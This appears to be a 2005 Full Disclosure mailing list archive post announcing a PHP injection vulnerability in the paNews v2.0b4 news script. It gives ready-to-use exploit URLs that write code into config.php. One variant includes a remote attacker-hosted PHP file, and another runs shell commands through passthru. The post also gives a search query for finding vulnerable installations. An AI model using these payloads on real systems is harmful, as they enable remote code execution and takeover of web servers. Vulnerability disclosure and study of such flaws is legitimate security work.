Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

paNews v2.0b4 - PHP Injection
From: tjomka <tjomka () navigator lv>
Date: Mon, 21 Feb 2005 07:16:47 +0200





oooo   oooo oooooooo8 ooooooooooo
 8888o  88 888        88  888  88 
 88 888o88  888oooooo     888     
 88   8888         888    888     
o88o    88 o88oooo888    o888o    
********************************
**** Network security team *****
********* nst.e-nex.com ********
********************************
* Title: paNews v2.0b4
* Bug found by: nst
* Date: 20.02.2005
********************************

web: http://www.phparena.net/panews.php
google: allintitle:paNews v2.0b4

PHP Injection
Bug works only if:
1. register_globals=On
2. folder "includes" is writable

p.s. please disable - javascripts =-]

Example 1

http://victim/panews/includes/admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&form[autoapprove]=$nst&disvercheck=$nst&installed=$asd&showcopy=include($nst)

then:

http://victim/panews/includes/config.php?nst=http://your/file.php


Example 2

http://victim/panews/includes/admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&form[autoapprove]=$nst&disvercheck=$nst&installed=$asd&showcopy=passthru($nst)

then:

http://victim/panews/includes/config.php?nst=id

Attachment: paNews_v2.0b4.txt
Description:

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

  By Date           By Thread  

Current thread:
  • paNews v2.0b4 - PHP Injection tjomka (Feb 21)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault